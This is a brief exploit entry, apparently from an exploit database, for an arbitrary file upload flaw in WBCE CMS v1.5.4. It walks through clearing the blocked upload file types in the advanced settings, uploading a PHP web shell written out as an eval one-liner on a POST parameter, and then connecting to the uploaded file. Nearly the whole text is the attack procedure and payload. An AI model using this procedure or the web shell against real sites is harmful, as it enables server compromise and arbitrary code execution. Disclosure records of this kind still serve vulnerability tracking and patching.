Exploit Title: WBCE CMS v1.5.4 can implement getshell by modifying the upload file type
Product: WBCE CMS (https://github.com/WBCE/WBCE_CMS)
Version: v1.5.4
Describe:An arbitrary file upload vulnerability in the Server Settings module of WBCE CMS v1.5.4 allows attackers to execute arbitrary code via a crafted PHP file.
Select show advance options in Settings
Set No upload for this filetypes to null
Select Upload File
Upload Trojans<? php @eval($_POST['test']) ?>
Found that the storage path can be connected
Try to connect